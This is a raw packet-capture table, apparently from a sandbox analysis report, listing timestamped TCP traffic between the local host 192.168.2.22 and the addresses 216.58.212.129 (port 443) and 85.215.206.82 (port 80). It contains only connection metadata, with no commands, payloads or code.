                                                                                                                                                                        Oct 23, 2024 17:27:01.605511904 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.605521917 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605593920 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606128931 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606420040 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606429100 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606451988 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606460094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606506109 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606507063 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606513977 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606579065 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.660851955 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.660912991 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.660942078 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.660953999 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.661052942 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.661052942 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.661071062 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.661086082 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.679948092 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.679959059 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.679991007 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680006027 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680016041 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680030107 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680212975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680212975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680212975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680237055 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680824995 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680834055 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680857897 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680865049 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680888891 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680907011 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680927992 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680938959 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.681943893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.681966066 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.681988001 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.682037115 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.682037115 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.682049036 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.682383060 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.723078012 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.723104954 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.723285913 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.723285913 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.723304987 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.777254105 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.777299881 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.777559996 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.777559996 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.777580023 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779822111 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779830933 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779850960 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779870033 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779963017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.779963017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.779963017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.779989958 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797566891 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797638893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797652960 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797748089 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.797806025 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797815084 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797961950 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.797961950 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.798295021 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798304081 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798353910 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.798371077 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798387051 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798423052 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.799381971 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799388885 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799424887 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799438953 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.799452066 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799465895 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.799484015 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.840826035 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.840886116 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.841058969 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.841058969 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.841058969 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.841083050 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.894658089 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.894722939 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.894937992 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.894937992 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.894961119 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896291018 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896377087 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.896385908 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896399021 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896444082 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896450043 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.896492958 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.914580107 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914588928 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914691925 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914716959 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.914736032 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914877892 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.449352980 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.449393034 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.449402094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.449419022 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450172901 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450197935 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450227022 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450237989 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450249910 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450299025 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450340986 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450745106 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:15.678776026 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:15.684195995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:15.684339046 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:15.684478998 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:15.690139055 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.568993092 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569022894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569034100 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569329977 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.569386959 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569408894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569422007 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569432974 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569447994 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569458961 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569466114 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.569469929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569484949 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.569510937 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.574902058 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.574930906 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.574944973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.575015068 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.709191084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709213972 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709227085 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709328890 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.709467888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709525108 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709579945 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709590912 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709600925 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.709630013 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.710002899 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710056067 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710069895 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710103989 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.710120916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710167885 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.729301929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729326010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729381084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729429960 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.729671955 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729747057 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.828368902 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828393936 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828500986 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828564882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828577042 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828588963 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828618050 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.828618050 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.828701973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828923941 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.829464912 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829477072 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829488039 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829555035 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.829799891 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829812050 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829857111 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.849289894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849317074 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849329948 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849411011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849416971 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.849595070 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.947623014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947721004 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947731972 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947743893 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947757006 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947880030 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.947880030 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.948143005 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948223114 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948234081 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948254108 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948312044 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.948312044 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.968518019 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968595028 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968609095 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968710899 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968727112 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968885899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.968885899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.066409111 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.066452026 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.066623926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.066895008 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.066994905 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067064047 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067076921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067091942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067106009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.067106009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.067331076 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.067497015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067558050 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067568064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067620993 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.087691069 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.087706089 CEST804917385.215.206.82192.168.2.22
Oct 23, 2024 17:27:17.087718010 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.087769985 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.087820053 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.087831974 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.087858915 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:17.087858915 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:17.088323116 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.088340998 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.088409901 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:17.088409901 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:17.586044073 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.586462975 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.587224960 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:17.866082907 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.866096973 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.866107941 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.866182089 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.866194010 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:17.866343975 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:17.866343975 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.008122921 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.008155107 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.008167028 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.008276939 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.008287907 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.008300066 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.008323908 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.008346081 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.008503914 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.008548975 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.008601904 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.147834063 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.147861004 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.147874117 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148021936 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148035049 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148099899 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.148111105 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148123026 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148143053 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.148147106 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148156881 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.148355007 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148367882 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.148411989 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.149017096 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.149041891 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.149096012 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.266156912 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.266180992 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.266192913 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.266335011 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.287240028 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287295103 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.287318945 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287333012 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287369013 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.287381887 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287455082 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287467957 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287499905 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.287581921 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287584066 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.287626982 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
